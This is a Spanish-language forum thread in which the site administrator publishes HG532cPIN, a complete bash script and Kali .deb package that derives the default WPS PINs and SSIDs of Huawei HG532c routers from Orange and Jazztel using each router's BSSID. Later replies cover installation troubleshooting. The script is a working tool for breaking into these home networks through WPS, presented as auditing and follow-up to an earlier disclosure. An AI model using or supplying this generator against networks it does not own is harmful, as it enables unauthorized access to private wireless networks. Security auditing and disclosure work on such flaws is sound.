El libre pensamiento para un internet libre

No estas registrado.  

Anuncio

Wifi-highpower.es es distribuidor oficial de Alfa Network

#1 29-11-2016 00:56:43

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 4,267

HG532cPIN: Generador Pin Huawei HG532c Jazztel_XX y FTE-XXXX

HG532cPIN: Generador Pin por defecto de los Huawei HG532c con eSSID por defecto Jazztel_XX y FTE-XXXX

HG532cPIN_3.jpg

¡Buenas tardes noches!
Subo para descargas y formato *.deb el script HG532cPIN
Para los detalles sobre al algoritmo codificado y los dispositivos afectados les invito a leer el full disclosure: Algoritmo PIN de los HG532c de Huawei (redes FTE-XXXX y jazztel_XX)
Para los que siempre tienen prisas...
En resumen: 
  Si tu tiempo está tan preciado a lo mejor lo estas perdiendo leyendo esto.
El algoritmo no es nada nuevo, lo publiqué en 2012 con la primera versión de WPSPIN.
  Ya esta incluido en todos los scripts que usas para auditorias WPS en España.
  Además este modelo esta en vía de extinción, Orange y Jazztel han parrado de distribuirlos desde años (¿5?) y han pasado a las livebox (arcadyan-orange) y a los ZTE (jazztel.) 
 
¿Por qué sacar cinco años después un código con un algoritmo viejo?
Hace poco v1sit0r se ha interesado a los algoritmos WPS conocidos para ampliar su programa (airgeddon)
Me he dado cuenta que el algoritmo era muy difícil de encontrar y entender (al pesar de ser simple) en WPSPIN ya que se fundía en dos funciones.
Me he dado cuenta también de que podía mejorarlo, dejarlo más limpio (gracias shellcheck y v1sit0r por haberme hablado de el)  y más simple.
  También me he dado cuenta que me había olvidado de generar el eSSID por defecto cuando este había sido modificado.
  No importa a la hora de auditar una red, pero si se sabe hacer... ¿Por qué no incluirlo? 

Instalación y uso

 

paquete *.deb para kali linux

Podemos instalar en una linea así:

wget https://www.wifi-libre.com/img/members/3/HG532cPIN_1_0-0.deb && sudo  dpkg -i HG532cPIN_1_0-0.deb

Sino lo descargas: HG532cPIN_1_0-0.deb
Abres una consola en tu directorio Descargas y lanzas la instalación

sudo dpkg -i HG532cPIN_1_0-0.deb

Una vez instalado el icono para lanzar el script aparece en tu menú wireless. (Aplicaciones>Ataques wireless>Herramientas wireless

HG532cPIN_1.jpg

Hacemos clic y, magia, el script se lanza... HG532cPIN_2.jpg
Des-instalar HG532cPIN es tan fácil como teclear

sudo dpkg -r HG532cPIN

fuente bash para todos sistemas

Para los que no usan kali Linux o prefieren lanzar el script sin tenerlo instalado, aquí tenéis el código fuente bash.

#!/bin/bash
# Script: HG532c.sh
# Copyleft : GPL v.3
# Author: kcdtv @ wifi-libe
# Description: HG532c.sh will generate the default WPS PIN and SSID of Huawei HG532c, a popular box used by several ISP in Spain (orange and jazztel) 
# Visit www.wifi-libre.com for more details.  


#### Function

WPSCHECKSUM(){                                                                # Generate the 8th and last digit of the WPS PIN (checksum)  
ACCUM=$(($(echo "$STRING" | cut -c 1) * 3 + $(echo "$STRING" | cut -c 2) + $(echo "$STRING" | cut -c 3) * 3 + $(echo "$STRING" | cut -c 4) + $(echo "$STRING" | cut -c 5) * 3 + $(echo "$STRING" | cut -c 6) + $(echo "$STRING" | cut -c 7) * 3)) # Summing and multiplication with the digits following WPS checksum rule
CHECKSUM=$((((10 - $((ACCUM%10))))%10))                                       # Generating the checksum
}

###Script

echo -e "
               \e[41m _   _  ____ ____ _________      \e[100m  ____ ___ _   _ \e[0m
               \e[41m| | | |/ ___| ___|___ /___ \ ___ \e[100m |  _ \_ _| \ | |\e[0m
               \e[41m| |_| | |  _|___ \ |_ \ __) / __|\e[100m | |_) | ||  \| |\e[0m
               \e[41m|  _  | |_| |___) |__) / __/ (__ \e[100m |  __/| || |\  |\e[0m
               \e[41m|_| |_|\____|____/____/_____\___|\e[100m |_|  |___|_| \_|\e[0m
               \e[41m                                 \e[100m                 \e[0m

               coded by \e[45mkcdtv\e[0m for \e[104mwww.wifi-libre.com\e[0m copyleft GPL

           Script to generate the default PIN and eSSID of Huawei HG532c, 
                  a device used by the ISP orange and jazztel

--------------------------------------------------------------------------------

"
read -r -ep  "Insert bSSID and press [Enter]: " BSSID  
while ! (echo "$BSSID" | tr a-f A-F | egrep -q "^([0-9a-fA-F]{2}:){5}[0-9a-fA-F]{2}$") # Loop to check the conformity of the the entered bSSID 
  do             
    echo -e " \e[1m\e[31mSyntax error\e[0m : Nonconforming mac address"   # test error
    echo -e "                                  
\e[36mPlease enter a valid bSSID (12 hexadecimal digits)
example: 34:6B:D3:01:23:45
\e[0m"
    read -r -ep   "Insert bSSID and press [Enter]: " BSSID  
done                                                                                  
CONVERTEDBSSID=$(printf '%d\n' 0x"$(echo "$BSSID" | cut -c 10,11,13,14,16,17)")   # Convert from hexadecimal to decimal the 6 lasts digits of bSSID


###### Generating first PIN (PIN1) with it default SSID (SSID1) 
STRING=$(printf '%07d\n' $((CONVERTEDBSSID%10000000)))                       # To ensure that we have strictly a 7 digits string 
WPSCHECKSUM                                                                   # To generate the WPS checksum
PIN1=$STRING$CHECKSUM                                                         
SSID1=$(printf "%X\n" $((0x$(echo "$BSSID" | cut -c 13-14,16-17) - 0x7)))       # The default SSID that goes with this PIN
SSID1=$( echo "0000$SSID1" | egrep -o '.{1,4}$')                              # Dirty but easy walk-around to get a 4 digits string for the essid 

##### Generating second PIN (PIN2) with it default SSID (SSID2)
STRING=$(printf '%07d\n' $(($((CONVERTEDBSSID%10000000))+8)))                         # To generate the second PIN we have to add 8 to our converted bSSID
WPSCHECKSUM
PIN2=$STRING$CHECKSUM
SSID2=$(printf "%X\n" $((0x$(echo "$BSSID" | cut -c 13-14,16-17) + 0x1)))       # To generate the default ssid we have to add 1 (-7 for PIN1) 
SSID2=$( echo "0000$SSID2" | egrep -o '.{1,4}$') 

##### Generating third PIN (PIN3) with it default SSID (SSID3)
STRING=$(printf '%07d\n' $(($((CONVERTEDBSSID%10000000))+14)))
WPSCHECKSUM
PIN3=$STRING$CHECKSUM
SSID3=$(printf "%X\n" $((0x$(echo "$BSSID" | cut -c 13-14,16-17) + 0x7)))       # for the third ssid: end bssid + 7
SSID3=$( echo "0000$SSID3" | egrep -o '.{1,4}$')

##### Display the results with a check on bssid
case $(echo "$BSSID" | cut -c 1-2,4-5,7-8) in
04C06F | 202BC1 | 285FDB | 346BD3 | 80B686 | 84A8E4 | B4749F | BC7670 | CC96A0 | F83DFF)   # FTE bssid
echo -e "

 WPS PIN is \e[1m\e[31m$PIN1\e[0m for essid \e[35mFTE-$SSID1\e[0m
 WPS PIN is \e[1m\e[31m$PIN2\e[0m for essid \e[35mFTE-$SSID2\e[0m
 WPS PIN is \e[1m\e[31m$PIN3\e[0m for essid \e[35mFTE-$SSID3\e[0m 

"
;;
C8D15E)
echo -e "

 WPS PIN is \e[1m\e[31m$PIN1\e[0m for essid \e[35mJazztel_$(echo "$SSID1" | cut -c 3-4)\e[0m
 WPS PIN is \e[1m\e[31m$PIN2\e[0m for essid \e[35mJazztel_$(echo "$SSID2" | cut -c 3-4)\e[0m
 WPS PIN is \e[1m\e[31m$PIN3\e[0m for essid \e[35mJazztel_$(echo "$SSID3" | cut -c 3-4)\e[0m 

"
;;
*)
echo -e "

 This bSSID is not one used by HG532c
 The PIN are displayed but will surely not work...

PIN1 is $PIN1
PIN2 is $PIN2 
PIN3 is $PIN3

"
esac
echo -e  "
                     Bye! See in you in \e[33mwww.wifi-libre.com\e[0m!
"
exit 0 

  Copiar, pegar en un editor de texto, guardar como HG523cPIN.sh o lo que queréis, abrir una consola en el directorio que contiene el script y lanzarlo con

bash HG532cPIN.sh

  ¡Hasta luego! wink

Desconectado

Anuncio

Wifi-libre.com: El libre pensamiento para un internet libre / Regístrese ahora

#2 30-07-2018 21:38:52

jlx
Usuario

Registrado: 27-07-2018
Mensajes: 8

Re: HG532cPIN: Generador Pin Huawei HG532c Jazztel_XX y FTE-XXXX

Hola,

Lo estoy probando¿ entonces este genera lo mismo que el cáculo de Zao?

Saludos,

Julián

Desconectado

#3 30-07-2018 22:04:21

josep345
Usuario

Registrado: 19-11-2017
Mensajes: 613

Re: HG532cPIN: Generador Pin Huawei HG532c Jazztel_XX y FTE-XXXX

Bienvenido compañero jlx/julian,,no se si sabes que no es necesario firmar cada mensaje con tu nombre,,mas que nada porque acabarás aburrido,,una cosa es seguro ,es original,un saludo. img

Edit.Por cierto, la imagen del hilo esta muy bien,casi ilustra el tema por si sola. img

Ultima edición por josep345 (30-07-2018 22:14:10)


Debes Aprender que puedes hacer Todo bien y aun así fallar.

Creación Alargador USB-3.0 Con Cable RJ45   

Desconectado

#4 30-07-2018 23:29:20

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 4,267

Re: HG532cPIN: Generador Pin Huawei HG532c Jazztel_XX y FTE-XXXX

No es Zao es Zaho.Ya te he dicho antes que el primer PIN es igual al "PIN zaho".
Si quieres mas detalles lea el hilo explicativo, lo tienes todo aquí: Algoritmo PIN de los HG532c de Huawei (redes FTE-XXXX y jazztel_XX)

Edit.Por cierto, la imagen del hilo esta muy bien,casi ilustra el tema por si sola.

big_smile

Desconectado

#5 31-07-2018 20:08:27

jlx
Usuario

Registrado: 27-07-2018
Mensajes: 8

Re: HG532cPIN: Generador Pin Huawei HG532c Jazztel_XX y FTE-XXXX

Por ahora me da
bash: HG532cPIN.sh: No existe el fichero o el directorio

¿ cual sería la ruta del *.sh ejecutable?

Saludos,

Julián

Desconectado

#6 31-07-2018 20:14:05

crash
Usuario

Registrado: 25-10-2017
Mensajes: 948

Re: HG532cPIN: Generador Pin Huawei HG532c Jazztel_XX y FTE-XXXX

la ruta seria desde donde tu lo tengas instalado. (si has copiado el script).
si has instalado el .deb entonces usa esto.

sudo find / -name HG532cPIN.sh

Desconectado

#7 31-07-2018 20:42:57

jlx
Usuario

Registrado: 27-07-2018
Mensajes: 8

Re: HG532cPIN: Generador Pin Huawei HG532c Jazztel_XX y FTE-XXXX

/usr/share/applications/HG532cPIN/HG532cPIN.sh

Synaptic fue más rápido ;-)

Desconectado

#8 31-07-2018 20:49:35

crash
Usuario

Registrado: 25-10-2017
Mensajes: 948

Re: HG532cPIN: Generador Pin Huawei HG532c Jazztel_XX y FTE-XXXX

te a sido mas rapido por ser un paquete .deb pero no es asi como se hace una busqueda.
tienes que hacerlo como te puesto para buscarlo por el nombre de manera correcta.
o también puedes usar

locate HG532cPIN.sh

personalmente prefiero la opción find a locate. pero para gustos los colores.

Desconectado

#9 01-08-2018 13:30:29

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 4,267

Re: HG532cPIN: Generador Pin Huawei HG532c Jazztel_XX y FTE-XXXX

Si usas find desde la raíz será siempre más lento que symaptic o locate.
¿Por qué? Porque, como lo señalaba crash, dpkg solo busca los paquetes deb instalados y locate busca en una base de datos que se genera arrancado el sistema.
Mientras que find revisa de forma recursiva todo el sistema de fichero.
En tu caso fue buena idea usar synaptic ya que buscabas un paquete *.deb
locate es más rápido que find pero no te hubiera encontrado el scrript porque lo has instalado en la sesión en corso. Lo hubiera encontrado al próximo reinicio.
Una búsqueda con find desde la raíz es exhaustiva: Si está, find lo encuentra. 
Recuerdo que el paquete deb es unicamente para Kali linux, no sé si lo has instaldo en Kali Linux o otro sistema, sería bien que me lo digas para que sepa si tengo que arreglar el bug.  wink
Haré un repositorio github para el script, no sé por qué no lo he hecho. tongue

Desconectado

#10 01-08-2018 15:21:03

jlx
Usuario

Registrado: 27-07-2018
Mensajes: 8

Re: HG532cPIN: Generador Pin Huawei HG532c Jazztel_XX y FTE-XXXX

kcdtv escribió:

Recuerdo que el paquete deb es unicamente para Kali linux, no sé si lo has instaldo en Kali Linux o otro sistema, sería bien que me lo digas para que sepa si tengo que arreglar el bug.  wink
Haré un repositorio github para el script, no sé por qué no lo he hecho. tongue

Uso Kali. apt-xapian lo ha mejorado bastnate. Otra ventaja de los comandos APT es que no tienes que saber el nombre de los archivos instalados para encontrarlos.

Desconectado

#11 01-08-2018 15:43:14

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 4,267

Re: HG532cPIN: Generador Pin Huawei HG532c Jazztel_XX y FTE-XXXX

OK. Lo pongo en mi "todo list" para la vuelta al cole.

Desconectado

Anuncio

Wifi-libre.com: El libre pensamiento para un internet libre / Regístrese ahora

Temas similares

Tema Respuestas Vistas Ultimo mensaje
Pegado:
364 87606 Hoy 09:01:47 por esteiner
9 498 Hoy 09:00:20 por d1k0w0ns
Ayuda pmkid por dannysr
2 68 Hoy 08:33:45 por d1k0w0ns
77 4507 Hoy 08:17:05 por Xavi
Saludos a todos por dannysr
2 34 Hoy 07:36:37 por crash

Pie de página

Información del usuario

Ultimo usuario registrado: OKComputer_1944
Usuarios registrados conectados: 1
Invitados conectados: 7

Conectados: sol666

Estadisticas de los foros

Número total de usuarios registrados: 1,122
Número total de temas: 1,127
Número total de mensajes: 11,685

Máx. usuarios conectados: 69 el 15-10-2017 09:23:21